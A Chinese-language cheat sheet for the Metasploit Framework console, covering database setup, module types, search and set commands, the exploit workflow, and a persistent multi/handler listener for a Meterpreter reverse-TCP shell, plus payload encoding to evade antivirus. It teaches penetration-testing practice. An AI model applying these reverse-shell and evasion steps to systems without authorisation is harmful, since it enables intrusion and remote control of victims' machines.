注意:使用前先

msfupdate

文件目录

/usr/share/metasploit-framework/

数据库操作

msf > msfdb
[*] exec: msfdb
Manage a metasploit framework database

msfdb init # initialize the database
msfdb reinit # delete and reinitialize the database
msfdb delete # delete database and stop using it
msfdb start # start the database
msfdb stop # stop the database

建立数据库缓存

msf > service postgresql start
msf > db_rebuild_cache

技术功能模块

Exploits   利用系统漏洞进行攻击的模块,对应每一个具体漏洞的攻击方法

Payload   成功exploit之后,真正在目标系统执行的代码或者指令

Single: all in one 体积较大,全功能

Stager: 体积较小,用于建立连接

Stages: 建立连接之后下载的后续payload

Auxiliary   信息收集,指纹,扫描,枚举等功能的辅助模块

Encoders   对payload进行加密以躲避AV检查

Nops   提高payload稳定性及维持大小

 

MSF控制台命令

 

search name:mysql  path:scada  platform:aix type:aux author:aaron  cve:2011    可多条件同时搜索

search -h  帮助

Use

use 漏洞路径

– info  显示详细信息

– show options 显示可修改选项

–show payloads 显示可利用payloads

–show targets 显示可用目标

–show advanced 显示高级

–show evasion 显示躲避

–show missing  显示还剩什么没填完

 

set 参数

set RHOST 192.168.8.117
set target //指定目标操作系统
unset //取消设置

setg 参数

和set不同的是setg //set_global  全局设置

Payload

一些exploit漏洞需要注入payload达到渗透功能

-show payloads 显示适配的payload

-set payload 路径  选择payload

Exploit漏洞利用过程:  search到漏洞—->use 路径—->info查看信息以及show option—->set 参数—->set payload指定payload—->run 进行exploit

 

建立持续性监听端口

msf>use exploit/multi/handler
msf>set payload windows/meterpreter/reverse_tcp
msf>set lhost
msf>set lport
msf>set ExitOnSession false
msf>exploit -j

-j选项能够让这个exploit以jobs的形式持续在后台运行。

set ExitOnSession false 能够让单个session退出时jobs不结束,同时可以维持多个sessions